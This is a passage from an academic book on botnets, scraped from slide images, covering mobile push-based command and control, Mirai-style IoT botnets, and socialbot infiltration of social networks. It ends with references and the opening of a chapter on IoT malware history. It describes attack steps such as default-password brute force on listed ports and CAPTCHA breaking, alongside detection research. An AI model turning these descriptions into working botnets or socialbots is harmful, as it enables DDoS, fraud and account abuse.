push notification service that makes it an attractive feature in mobile phones. For
example, with this service, there is no need for the application server to periodically
Botnet Architectures ■ 21](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-38-320.jpg)
![check the mobile device to find out whether the phone is ON or OFF. In addition,
notifications are sent to mobile devices without the need for a continuous probing of
application servers. These features simplify the mobile application development and
greatly reduce the workload on application servers. This explains the popularity of
this service in most smartphone platforms and hence, can be utilized for the
implementation of C&C in mobile botnets.
A prototype of cloud-based push-styled mobile botnets using Google Cloud to
Device Messaging (C2DM) service for Android was presented in [53]. The main
idea is to disseminate botmaster commands to the bots population in a stealthy
manner as part of the normal C2DM traffic. This means that there is no direct
communication between a botmaster and the bot devices. Instead, communica-
tion between them is done through the C2DM service. Implementing the C&C
for such botnets involves bot registration stage and command dissemination stage.
Although C2DM was officially deprecated, similar mechanisms, such as Firebase
Cloud Messaging (FCM) from Google, can be used to construct cloud-based
push-styled mobile botnets.
1.6 IoT Botnets
IoT botnets, such as Mirai, QBot, BASHLITE, Hajime, and their variants, aim
to compromise IoT devices that are weakly configured and connected to the
Internet. Most recently, Torii bot was discovered and is considered to be more
sophisticated than previously known IoT botnets [54]. IoT devices are distributed
worldwide with the goal of having them running all the time such as printers,
DVRs, network routers, IP cameras, and CCTVs. The manufacturers of IoT
devices focused on devices functionality and ease of installation to attract
customers. In addition, many users leave the default username and password
that were shipped with the device unchanged. Mirai and other IoT botnets
exploit this simplicity of devices and compromise hundreds of thousands of
them relying on a dictionary of default user names and passwords from different
vendors. A large number of devices (victims) are orchestrated to launch DDoS
attacks against selected targets. Also, a large number can be used for spamming
and advertisement fraud. IoT botnets architecture consists of four main compo-
nents, which are: the Bot, the C&C server, the Loader, and the Report server
[55]. The role of each of these components is described below:
1. The Bot: which is the malware that infects a vulnerable IoT device. It has
two roles: the first role is to brute force search for new victims to be
compromised. New victims are IoT devices that were misconfigured, have
software holes, or have default username and passwords. Hence, it is
important for system administrators to install most recent software patches,
22 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-39-320.jpg)
![change passwords, and monitor their devices for any abnormal behavior.
The second role is to execute commands that are sent by the C&C server
such as the DDoS attack.
2. The C&C Server: which is controlled by the botmaster to send commands
to the bots such as launching a DDoS attack. The botmaster is a person
(hacker) who manages the botnet, develop, modify, and update bots’
programs and database. A DDoS command includes packets type (e.g.,
SYN flooding), the target address, and the duration of traffic.
3. The Loader: when a new IoT device is discovered and compromised by
a bot, the bot executes a command to find the newly compromised device’s
architecture and software. Then, the new device is directed to download the
corresponding botnet binaries from the loader server. The loader server has
many binaries for different device architectures including ARM and Intel.
4. Report Server: it contains different information and status of all the bots
(infected devices) in the botnet. Information includes IP address, port
number, device architecture, and login credentials.
The threat of IoT botnets arises from the large number of infected devices, which is
in the order of hundreds of thousands. These devices can result in a tremendous
network traffic if they are used to launch DDoS attacks. For example, a DDoS attack
on Krebs has reached to an unprecedented traffic of more than 600 Gbps in 2016
[56]. Researchers have shown that Mirai botnet has infected more than 65,000 IoT
devices in nearly 20 hours and the number has increased to reach 300,000 devices
[57]. This number is likely to increase, as the use of IoT devices are growing, which is
expected to have more than one hundred billion devices by 2030 [58], unless
effective countermeasure solutions are developed and used.
The infection process is based on brute-force search of devices with default user
name and passwords using remote connection (telnet) on standard open ports. TCP
ports 23, 2323, 7547, 5555, 23231, 37777, 6789, 22, 2222, 32, and 19058 are the
most popular ones [59]. Furthermore, most of UDP ports are targeted by compro-
mised IoT devices. Among the top targeted UDP ports are: port 37547, 137, 53413,
37547, 32124, and 28183 [60]. The IP addresses are randomly generated. After
a successful connection to an IoT device, the botnet closes the open ports to prevent
other botnets from trying to connect to the device. Default usernames and passwords,
in addition to simple passwords (such as 123456) are hard-coded into the IoT botnet
scripts. The IoT botnet resides in the memory of compromised IoT devices. A restart
or power-off of the device removes the botnet. However, this is difficult to be done
by system or network administrators. For example, if the infected devices are routers,
the network will be interrupted while routers are being powered-off and then
powered-on. Also, this action can result in a service level agreement (SLA) violation
of services with high availability.
Botnet Architectures ■ 23](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-40-320.jpg)
![The release of the source code of the Mirai botnet made it possible for researchers
to understand the behavior of IoT botnets. This behavior is common in IoT botnets
that were discovered, although some of them are more advanced than the original
Mirai. Defining policies and rules that can detect and capture compromised devices
can fight against the spread of IoT botnets. Access, communication, and usage polices
are among these desired definitions [61]. Moreover, smarter and more intelligent
methods can be developed using machine learning algorithms in order to efficiently
detect compromised IoT devices and alert system administrators to isolate them from
the network or block them automatically. For example, N-BaIoT is a method that
uses deep learning for anomaly detection of network traffic [62]. On another hand,
a method called AutoBotCatcher relies on the idea of mutual entities in the botnet
community. For example, bots communicate with a C&C server. This makes the
C&C server a mutual entity [58]. Based on identifying the botnet communities,
AutoBotCatcher can be utilized by ISPs and network administrator to further
investigate suspicious devices. In addition, methods such as encryption of IoT devices
memory and data, easy and automated techniques to modify devices passwords, using
different passwords than the ones that were shipped from factories, restricting access
of ports on devices, and updating the devices’ firmware with the latest patches are
among effective practices that prevent the widespread of IoT botnets [63].
1.7 Social Botnets
Socialbots are autonomous software programs that target online social networks
(OSNs) such as Facebook and Twitter. These programs mimic the behavior of real
users (humans) through posting comments (or tweets), re-posting messages that
others have posted, sending connection requests, accepting requests from others,
following others, etc. Socialbots aim to achieve mainly three objectives. The first one
is to launch campaigns in order to promote some opinions or ideas in a community
of users and making some topics popular. The second is to collect data especially
private user information. These information becomes available once a user accepts
a connection request from the socialbot. The third reason is to alter the graph
structure of OSNs, which results in having fake or misleading patterns in the social
network graph (vertices and edges). Boshmaf et al. showed that today’s OSNs are
vulnerable to socialbots and conducted experiments on Facebook OSN [64]. In
addition, Freitas et al. conducted socialbot experiments on Twitter OSN and showed
that socialbots can infiltrate Twitter [65].
1.7.1 Operation
The following are typical steps that are carried out by socialbot developers for
infiltration of OSNs.
24 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-41-320.jpg)
![1. Automatic creation of email accounts as most OSNs require an email for
verification. Hence, an adversary relies on email providers who allow an
unlimited number of email accounts. Some adversaries might choose to
create the email accounts manually.
2. Handling CAPTCHA as most OSNs rely on that technique to validate users.
Different methods are used by socialbots to break CAPTCHAs in order to
automate the process of infiltrating OSNs especially to launch a large-scale attack.
For example, socialbot developers use script identification, optical character
recognition methods, utilize botnets that ask users to recognize CAPTCHAs, or
rely on cheap labor business (CAPTCHA breaking business) to break
CAPTCHA [64,66,67].
3. Creating a profile for the accounts, which includes a job title and a picture.
This is very important in order to increase attractiveness. For example, a person
who has professional career attracts users. In addition, a good looking picture
has the greatest impact as described in [64]. Female profiles have higher
successful infiltration rate than male profiles. However, they both get similar
acceptance rate if they have high number of friends (contacts).
Developers of socialbots follow random behaviors in performing activities (i.e.,
posts, request, follow-back, etc.) in order to avoid being detected such as Realboy
project by Zack Coburn and Greg Marra [68].
Some methods use social network honeypots in order to trap adversaries. These
methods generate artificial profiles, monitor the profiles, and analyze their
activities [69]. Designing and collecting datasets of OSNs can help in developing
intelligent techniques that rely on anomalous behaviors for detecting socialbots
[70]. Machine learning, classification, and artificial intelligence techniques have
been developed in order to detect and isolate socialbots from OSNs [71–73].
However, more robust and sophisticated methods are still needed in order to
detect non-trivial socialbot behaviors.
1.8 Conclusion
Botnets are among the top cyber security issues in today’s Internet. Botnets have
witnessed major advancements in recent years in terms of their architectures, attack
activities, and types. The enormous growth of the Internet and its expansion in recent
years has contributed greatly in the development of new generation of botnets that
leverage the vulnerabilities of new protocols, applications, and devices that composes
the Internet. The nature and scale of botnet attacks have increased over time.
Traditionally, botnets have been used to conduct various forms of DDoS attacks,
email spam campaigns, click fraud and identity theft. Recently, botnets were used in
new malicious activities that include malware distribution, fast flux network services,
social campaigns and digital currency mining. Over the past fifteen years, significant
Botnet Architectures ■ 25](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-42-320.jpg)
![amount of research has been done in this area focusing on botnet characterization
and detection.
This chapter provided a detailed discussion about botnets and their main
characteristics. At the beginning, the chapter described the main steps of botnet life
time and highlighted the main characteristics that include the botnet size, geogra-
phical distribution, and spatial temporal correlation. The strength and resilience of
any botnet depend on the implementation of its C&C channel. Centralized and
P2P botnets were discussed as the main two architectures for the botnets commu-
nication topology. This includes traditional PC based botnets, mobile botnets, IoT
botnets and social botnets. For each type of the botnets, the main features were
highlighted and the C&C implementation methods were discussed. Overall, this
chapter provided a comprehensive review of botnets, their key features, the differ-
ences between botnet types, and their C&C implementations. Future research in
this field is expected to focus on efficient techniques for botnet detection, while
taking into consideration the new types of botnets that have emerged in recent years
and the new techniques that are used to implement stealthy and resilient C&C.
References
[1] Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, and Andreas Terzis. A multi-
faceted approach to understanding the botnet phenomenon. In Proceedings of the
6th ACM SIGCOMM Conference on Internet Measurement, IMC ’06, pages 41–52,
New York, NY, USA, 2006. ACM.
[2] T. Holz. A short visit to the bot zoo [malicious bots software]. IEEE Security
Privacy, 3(3):76–79, May 2005.
[3] D. Geer. Malicious bots threaten network security. Computer, 38(1):18–20, Jan
2005.
[4] B. McCarty. Botnets: Big and bigger. IEEE Security Privacy, 99(4):87–90, Jul 2003.
[5] G. P. Schaffer. Worms and viruses and botnets, oh my! rational responses to
emerging internet threats. IEEE Security Privacy, 4(3):52–58, May 2006.
[6] Keman Huang, Michael Siegel, and Stuart Madnick. Systematically understanding
the cyber attack business: A survey. ACM Computing Surveys, 51(4):1–70:36, Jul
2018.
[7] Europol and NATO Strategic Directions South NSDS. In Internet Organised Crime
Threat Assessment (IOCTA 2017). European Union Agency for Law Enforcement
Cooperation (Europol), 2017.
[8] Ayesha Binte Ashfaq, Zainab Abaid, Maliha Ismail, Muhammad Umar Aslam,
Affan A Syed, and Syed Ali Khayam. Diagnosing bot infections using bayesian
inference. Journal of Computer Virology and Hacking Techniques, 14(1):21–28,
2018.
[9] Shui Yu, Guofei Gu, Ahmed Barnawi, Song Guo, and Ivan Stojmenovic. Malware
propagation in large-scale networks. IEEE Transactions on Knowledge and Data
Engineering, 27(1):170–179, 2015.
26 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-43-320.jpg)
![[10] Terry Nelms, Roberto Perdisci, Manos Antonakakis, and Mustaque Ahamad.
Towards measuring and mitigating social engineering software download attacks.
In USENIX Security Symposium, pages 773–789, 2016.
[11] Francois Mouton, Louise Leenen, and Hein S. Venter. Social engineering attack
examples, templates and scenarios. Computers & Security, 59:186–209, 2016.
[12] Amir Javed, Pete Burnap, and Omer Rana. Prediction of drive-by download attacks
on twitter. Information Processing & Management, 2018.
[13] Antonio Nappa, M. Zubair Rafique, and Juan Caballero. The malicia dataset:
Identification and analysis of drive-by download operations. International Journal
of Information Security, 14(1):15–33, 2015.
[14] Guofei Gu, Junjie Zhang, and Wenke Lee. Botsniffer: Detecting botnet command
and control channels in network traffic. In Proceedings of the 15th Annual Network
and Distributed System Security Symposium (NDSS’08), Feb 2008.
[15] An Wang, Wentao Chang, Songqing Chen, and Aziz Mohaisen. Delving into
internet ddos attacks by botnets: Characterization and analysis. IEEE/ACM Transac-
tions on Networking, 26(6): 2843–2855, 2018.
[16] Aditya K Sood, Sherali Zeadally, and Richard J Enbody. An empirical study of
http-based financial botnets. IEEE Transactions on Dependable and Secure Comput-
ing, 13(2):236–251, 2016.
[17] Son Dinh, Taher Azeb, Francis Fortin, Djedjiga Mouheb, and Mourad Debbabi.
Spam campaign detection, analysis, and investigation. Digital Investigation, 12:S12–
S21, 2015.
[18] Paul Barford and Vinod Yegneswaran. An inside look at botnets. In Mihai Christodor-
escu, Somesh Jha, Douglas Maughan, Dawn Song, and Cliff Wang, editors, Malware
Detection, pages 171–191, Boston, MA, 2007. Springer US.
[19] Anirudh Ramachandran and Nick Feamster. Understanding the network-level
behavior of spammers. SIGCOMM Computer Communication Review, 36(4):291–
302, Aug 2006.
[20] Expert: Botnets no. 1 emerging internet threat. www.cnn.com/2006/tech/internet/
01/31/furst, Access Date: January 2019.
[21] Evan Cooke, Farnam Jahanian, and Danny McPherson. The zombie roundup:
Understanding, detecting, and disrupting botnets. In Proceedings of the Steps to
Reducing Unwanted Traffic on the Internet on Steps to Reducing Unwanted Traffic on
the Internet Workshop, SRUTI’05, pages 6–6, Berkeley, CA, USA, 2005. USENIX
Association.
[22] M. Patrick Collins, Timothy J. Shimeall, Sidney Faber, Jeff Janies, Rhiannon
Weaver, Markus De Shon, and Joseph Kadane. Using uncleanliness to predict
future botnet addresses. In Proceedings of the 7th ACM SIGCOMM Conference on
Internet Measurement, IMC ’07, pages 93–104, New York, NY, USA, 2007. ACM.
[23] Z. Chen, C. Ji, and P. Barford. Spatial-temporal characteristics of internet malicious
sources. In IEEE INFOCOM 2008 - The 27th Conference on Computer Communica-
tions, pages 2306–2314, Apr 2008.
[24] D. Dagon, G. Gu, C. P. Lee, and W. Lee. A taxonomy of botnet structures. In
Twenty-Third Annual Computer Security Applications Conference (ACSAC 2007),
pages 325–339, Dec 2007.
Botnet Architectures ■ 27](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-44-320.jpg)
![[25] Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, and Andreas Terzis. My botnet is
bigger than yours (maybe, better than yours): Why size estimates remain
challenging. In Proceedings of the First Conference on First Workshop on Hot Topics
in Understanding Botnets, HotBots’07, pages 5–5, Berkeley, CA, USA, 2007.
USENIX Association.
[26] David Dagon, Cliff Zou, and Wenke Lee. Modeling botnet propagation using time
zones. In Proceedings of the 13th Network and Distributed System Security Symposium
NDSS, 2006.
[27] C. C. Zou and R. Cunningham. Honeypot-aware advanced botnet construction
and maintenance. In International Conference on Dependable Systems and Networks
(DSN’06), pages 199–208, Jun 2006.
[28] Zakir Durumeric, Eric Wustrow, and J. Alex Halderman. Zmap: Fast internet- wide
scanning and its security applications. In Presented as part of the 22nd USENIX
Security Symposium (USENIX Security 13), pages 605–620, Washington, DC, 2013.
USENIX.
[29] F. Soldo, K. El Defrawy, A. Markopoulou, B. Krishnamurthy, and J. van der
Merwe. Filtering sources of unwanted traffic. In 2008 Information Theory and
Applications Workshop, pages 199–208, Jan 2008.
[30] Zisis Tsiatsikas, Marios Anagnostopoulos, Georgios Kambourakis, Sozon Lambrou,
and Dimitris Geneiatakis. Hidden in plain sight. sdp-based covert channel for
botnet communication. In International Conference on Trust and Privacy in Digital
Business, pages 48–59, 2015. Springer.
[31] Zisis Tsiatsikas, Georgios Kambourakis, Dimitris Geneiatakis, and Hua Wang. The
devil is in the detail: Sdp-driven malformed message attacks and mitigation in sip
ecosystems. IEEE Access, 7:2401–2417, 2019.
[32] K. Singh, A. Srivastava, J. Giffin, and W. Lee. Evaluating emails feasibility for
botnet command and control. In 2008 IEEE International Conference on Dependable
Systems and Networks With FTCS and DCC (DSN), pages 376–385, Jun 2008.
[33] J. Zhang, R. Perdisci, W. Lee, X. Luo, and U. Sarfraz. Building a scalable system for
stealthy p2p-botnet detection. IEEE Transactions on Information Forensics and
Security, 9(1):27–38, Jan 2014.
[34] Babak Rahbarinia, Roberto Perdisci, Andrea Lanzi, and Kang Li. Peerrush: Mining
for unwanted p2p traffic. Journal of Information Security and Applications, 19(3):194–
208, 2014.
[35] Rafael A. Rodrguez-Gmez, Gabriel Maci-Fernndez, Pedro Garca-Teodoro,
Moritz Steiner, and Davide Balzarotti. Resource monitoring for the detection of
parasite p2p botnets. Computer Networks, 70:302–311, 2014.
[36] Christian Rossow, Dennis Andriesse, Tillmann Werner, Brett Stone-Gross,
Daniel Plohmann, Christian J. Dietrich, and Herbert Bos. P2PWNED: Mod-
eling and Evaluating the Resilience of Peer-to-Peer Botnets. In Proceedings of
the 34th IEEE Symposium on Security and Privacy (S&P), San Francisco, CA,
May 2013.
[37] Thorsten Holz, Moritz Steiner, Frederic Dahl, Ernst Biersack, and Felix C Freiling.
Measurements and mitigation of peer-to-peer-based botnets: A case study on storm
worm. LEET, 8(1):1–9, 2008.
28 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-45-320.jpg)
![[38] Nicolas Falliere. Sality: Story of a peer-to-peer viral network. Rapport technique,
Symantec Corporation, 32, 2011.
[39] Joan Calvet, Carlton R Davis, and Pierre-Marc Bureau. Malware authors don’t
learn, and that’s good! In 2009 4th International Conference on Malicious and
Unwanted Software (MALWARE), pages 88–97, 2009, IEEE.
[40] Max Kerkers, Jose´ Jair Santanna, and Anna Sperotto. Characterisation of the
kelihos. b botnet. In IFIP International Conference on Autonomous Infrastructure,
Management and Security, pages 79–91, 2014, Springer.
[41] Daniel Plohmann and Elmar Gerhards-Padilla. Case study of the miner botnet. In
2012 4th International Conference on Cyber Conflict (CYCON), pages 1–16, 2012,
IEEE.
[42] Hamad Binsalleeh, Thomas Ormerod, Amine Boukhtouta, Prosenjit Sinha,
Amr Youssef, Mourad Debbabi, and Lingyu Wang. On the analysis of the zeus
botnet crimeware toolkit. In 2010 Eighth Annual International Conference on Privacy
Security and Trust (PST), pages 31–38, 2010, IEEE.
[43] The zeroaccess rootkit. https://nakedsecurity.sophos.com/zeroaccess/, Access Date:
January 2019.
[44] Marios Anagnostopoulos, Georgios Kambourakis, and Stefanos Gritzalis. New
facets of mobile botnet: Architecture and evaluation. International Journal of
Information Security, 15(5):455–473, Oct 2016.
[45] Jos Martins, Catarina Costa, Tiago Oliveira, Ramiro Gonalves, and Frederico Branco.
How smartphone advertising influences consumers’ purchase intention. Journal of
Business Research, 94:378–387, 2019.
[46] Axelle Apvrille. Symbian worm yxes: Towards mobile botnets? Journal in Computer
Virology, 8(4):117–131, Nov 2012.
[47] Phillip Porras, Hassen Sa¨Idi, and Vinod Yegneswaran. An analysis of the ikee.b
iphone botnet. In Andreas U. Schmidt, Giovanni Russello, Antonio Lioy, Neeli
R. Prasad, and Shiguo Lian, editors, Security and Privacy in Mobile Information and
Communication Systems, pages 141–152, Berlin, Heidelberg, 2010. Springer Berlin
Heidelberg.
[48] X. Wei, L. Gomez, I. Neamtiu, and M. Faloutsos. Malicious android applications in
the enterprise: What do they do and how do we fix it? In 2012 IEEE 28th
International Conference on Data Engineering Workshops, pages 251–254, Apr 2012.
[49] N. Etaher, G. R. S. Weir, and M. Alazab. From zeus to zitmo: Trends in banking
malware. In 2015 IEEE Trustcom/BigDataSE/ISPA, volume 1, pages 1386–1391,
Aug 2015.
[50] Y. Zhou and X. Jiang. An analysis of the anserverbot trojan. technical report, 2011.
[51] Marios Anagnostopoulos, Georgios Kambourakis, Panagiotis Drakatos, Michail
Karavolos, Sarantis Kotsilitis, and David KY Yau. Botnet command and control
architectures revisited: Tor hidden services and fluxing. In International Conference on
Web Information Systems Engineering, pages 517–527, 2017, Springer.
[52] Yuanyuan Zeng, Kang G. Shin, and Xin Hu. Design of sms commanded-and-
controlled and p2p-structured mobile botnets. In Proceedings of the Fifth ACM
Conference on Security and Privacy in Wireless and Mobile Networks, WISEC ’12,
pages 137–148, New York, NY, USA, 2012. ACM.
Botnet Architectures ■ 29](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-46-320.jpg)
![[53] Shuang Zhao, Patrick P. C. Lee, John C. S. Lui, Xiaohong Guan, Xiaobo Ma, and
Jing Tao. Cloud-based push-styled mobile botnets: A case study of exploiting the
cloud to device messaging service. In Proceedings of the 28th Annual Computer
Security Applications Conference, ACSAC ’12, pages 119–128, New York, NY,
USA, 2012. ACM.
[54] Jakub Kroustek, Vladislav Iliushin, Anna Shirokova, Jan Neduchal, and
Martin Hron. Torii botnet - not another mirai variant. url: https://blog.avast.com/
new-torii-botnet-threat-research, Access Date: January 2019.
[55] C. Kolias, G. Kambourakis, A. Stavrou, and J. Voas. Ddos in the iot: Mirai and
other botnets. Computer, 50(7):80–84, 2017.
[56] B. Krebs. Krebsonsecurity hit with record ddos. url: https://krebsonsecurity.com/
2016/09/krebsonsecurity-hit-with-record-ddos/, Access Date: January 2019.
[57] Manos Antonakakis, Tim April, Michael Bailey, Matthew Bernhard, Elie Bursztein,
Jaime Cochran, Zakir Durumeric, J. Alex Halderman, Luca Invernizzi, Michalis
Kallitsis, Deepak Kumar, Chaz Lever, Zane Ma, Joshua Mason, Damian Menscher,
Chad Seaman, Nick Sullivan, Kurt Thomas, and Yi Zhou. Understanding the mirai
botnet. In Proceedings of the 26th USENIX Conference on Security Symposium, SEC’17,
pages 1093–1110, Berkeley, CA, USA, 2017. USENIX Association.
[58] Gokhan Sagirlar, Barbara Carminati, and Elena Ferrari. Autobotcatcher:
Blockchain-based p2p botnet detection for the internet of things. 2018 IEEE 4th
International Conference on Collaboration and Internet Computing (CIC), pages 1–8,
2018.
[59] G. Kambourakis, C. Kolias, and A. Stavrou. The mirai botnet and the iot zombie
armies. In MILCOM 2017-2017 IEEE Military Communications Conference
(MILCOM), pages 267–272, Oct 2017.
[60] S. Torabi, E. Bou-Harb, C. Assi, M. Galluscio, A. Boukhtouta, and M. Debbabi.
Inferring, characterizing, and investigating internet-scale malicious iot device activ-
ities: A network telescope perspective. In 2018 48th Annual IEEE/IFIP International
Conference on Dependable Systems and Networks (DSN), pages 562–573, Jun 2018.
[61] S. M. Sajjad and M. Yousaf. Ucam: Usage, communication and access monitoring
based detection system for iot botnets. In 2018 17th IEEE International Conference
On Trust, Security and Privacy In Computing And Communications/12th IEEE
International Conference On Big Data Science and Engineering (TrustCom/BigDa-
taSE), pages 1547–1550, Aug 2018.
[62] Yair Meidan, Michael Bohadana, Yael Mathov, Yisroel Mirsky, Asaf Shabtai,
Dominik Breitenbacher, and Yuval Elovici. N-baiotnetwork-based detection of
iot botnet attacks using deep autoencoders. IEEE Pervasive Computing, 17:12–
22, 2018.
[63] O. Shwartz, Y. Mathov, M. Bohadana, Y. Oren, and Y. Elovici. Reverse engineering
iot devices: Effective techniques and methods. IEEE Internet of Things Journal, 5(6):
4965–4976,2018.
[64] Yazan Boshmaf, Ildar Muslukhov, Konstantin Beznosov, and Matei Ripeanu. The
socialbot network: When bots socialize for fame and money. In Proceedings of the
27th Annual Computer Security Applications Conference, ACSAC ’11, pages 93–102,
New York, NY, USA, 2011. ACM.
30 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-47-320.jpg)
![[65] C. Freitas, F. Benevenuto, S. Ghosh, and A. Veloso. Reverse engineering social- bot
infiltration strategies in twitter. In 2015 IEEE/ACM International Conference on
Advances in Social Networks Analysis and Mining (ASONAM), pages 25–32, Aug
2015.
[66] Leyla Bilge, Thorsten Strufe, Davide Balzarotti, and Engin Kirda. All your contacts
are belong to us: Automated identity theft attacks on social networks. In Proceedings
of the 18th International Conference on World Wide Web, WWW ’09, pages 551–
560, New York, NY, USA, 2009. ACM.
[67] Marti Motoyama, Kirill Levchenko, Chris Kanich, Damon McCoy,
Geoffrey M. Voelker, and Stefan Savage. Re: Captchas-understanding captcha-solving
services in an economic context. In USENIX Security Symposium, 2010.
[68] Zack Coburn and Greg Marra. Realboy: Believable twitter bots. http://ca.olin.edu/
2008/realboy/index.html, Access Date: January 2019.
[69] A. Paradise, A. Shabtai, R. Puzis, A. Elyashar, Y. Elovici, M. Roshandel, and C. Peylo.
Creation and management of social network honeypots for detecting targeted cyber
attacks. IEEE Transactions on Computational Social Systems, 4(3):65–79, Sep 2017.
[70] C. Pacheco, A. Garcia, R. Machado, and R. Salles. Building reference datasets to
support socialbots detection. In 2018 Workshop on Metrology for Industry 4.0 and
IoT, pages 198–202, Apr 2018.
[71] Chiyu Cai, Linjing Li, and Daniel Zeng. Detecting social bots by jointly modeling
deep behavior and content information. In Proceedings of the 2017 ACM on
Conference on Information and Knowledge Management, CIKM ’17, pages 1995–
1998, New York, NY, USA, 2017. ACM.
[72] Zhi Yang, Christo Wilson, Xiao Wang, Tingting Gao, Ben Y. Zhao, and Yafei Dai.
Uncovering social network sybils in the wild. ACM Trans. Knowl. Discov. Data,
8(1):2:1–2:29, Feb 2014.
[73] Xianchao Zhang, Haijun Bai, and Wenxin Liang. A social spam detection frame-
work via semi-supervised learning. In Revised Selected Papers of the PAKDD 2016
Workshops on Trends and Applications in Knowledge Discovery and Data
Mining - Volume 9794, pages 214–226, Berlin, Heidelberg, 2016. Springer-
Verlag.
Botnet Architectures ■ 31](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-48-320.jpg)
![2.3.4 Hajime . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .79
2.3.4.1 Infection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .82
2.3.4.2 Client Bot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .84
2.3.4.3 Scanner Extension Module . . . . . . . . . . . . . . . . . . . .86
2.3.5 BrickerBot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .88
2.3.5.1 BrickerBot Sentinels. . . . . . . . . . . . . . . . . . . . . . . . .90
2.3.6 VPNFilter. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .92
2.3.6.1 Extension Plug-Ins. . . . . . . . . . . . . . . . . . . . . . . . . .93
2.4 DDoS-for-Hire, the Case of Booters and Stressers . . . . . . . . . . . . . . . . . .95
2.5 Closing Thought . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .97
2.1 Introduction
The rise in popularity of IoT botnets centers around the Mirai attacks of
October 2016. In a period of only a few weeks, KrebsOnSecurity.com1
, OVH2
,
and Dyn3
all became victims of record-breaking distributed denial-of-service
(DDoS) attacks. The attacks that temporarily crippled KrebsOnSecurity.com
exceeded 600 Gbps in volume [1], one of the largest on record at the time. The
impact of the Dyn attacks was felt by large swathes of users in Europe and North
America and affected major internet platforms and services including Airbnb,
GitHub, Amazon, CNN, Twitter, Slack, PlayStation Network, Xbox Live, and
many more. Between the OVH and Dyn attacks, Mirai had its source code
published on HackForums and quickly replicated to more accessible platforms
such as GitHub. Tutorial blogs and YouTube videos detailing how to build and
deploy Mirai followed shortly. From that point forward, the attacker community
had access to a tool of mass destruction that was easy to build and deploy with an
opportunity to improve and extend its capabilities.
Since the Mirai attacks in 2016, IoT botnets have come a long way. The
original goal of Mirai was to create an efficient tool for performing DDoS attacks.
Later, IoT bots added new exploits, mainly to keep ahead of their competing
cousins, while mostly reusing the same scanning, command and control (C2),
and malicious payloads in terms of attack vectors.
By the end of 2017, IoT malware started taking advantage of the same exploit
vectors but carrying new malicious capabilities, such as cryptocurrency mining,
anonymizing proxy services, data exfiltration capabilities, rootkits, and self-
destructive sequences. The anonymizing proxies got leveraged for concealing
targeted attacks and spam or click-fraud campaigns. The sophistication of IoT
1 Website of investigative reporter Brian Krebs.
2 French web hosting provider.
3 Domain Name System (DNS) provider.
34 ■ Botnets](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-51-320.jpg)
![malware increased considerably as organized hacking groups joined the opportu-
nistic attacker community in their war on free distributed computing resources.
The VPNFilter malware, discovered by Cisco Talos in 2018 [2], was attributed to
a Russian state-sponsored cyber-crime group [3]. VPNFilter represents an inflec-
tion point in terms of sophistication, persistence, and evasive actions observed in
IoT malware. Up to that point, IoT malware was unsophisticated, providing
limited forms of evasion, little or no concealment of C2 activity, and no or
limited protection of C2 infrastructure.
While the most notorious, Mirai was not the first malware to take advantage of
IoT devices. As early as December 2013, a researcher [4] observed hundreds of
thousands of spam emails originating from a botnet made up of one hundred
thousand hacked appliances. While the majority of malicious mail was
initiated by home networking devices, such as routers and network attached
storage systems (NAS), a significant percentage of malicious email came from
nontraditional sources such as connected multimedia centers, smart televisions,
and at least one refrigerator. The words “thingbot” and “thingbot-net” were
coined by Proofpoint to refer to these newly discovered IoT-based botnets. In
March 2014, DDoS attacks were observed [5] originating from a botnet
consisting of over 900 CCTV cameras. All compromised devices used in the
attack were running embedded Linux with BusyBox. The malware was an
ELF binary compiled for the ARM architecture and a variant of the BASH-
LITE (aka Gafgyt) malware, known for scanning network devices running
BusyBox and looking for open Telnet/SSH services, which are susceptible to
brute force dictionary attacks. In this specific case, the variant also came with
an ability to launch HTTP Get flood denial-of-service (DoS) attacks from the
compromised devices. BASHLITE was not the first Linux malware to spread
through Telnet services using username/password combinations however. The
technique was already used back in 2012 by Lightaidra, a worm supporting
a number of different architectures such as MIPS, ARM, and PPC and known
to perform DDoS attacks. Between 2015 and 2016, different Linux malwares
were discovered, all primarily used for performing DDoS attacks: Elknot/
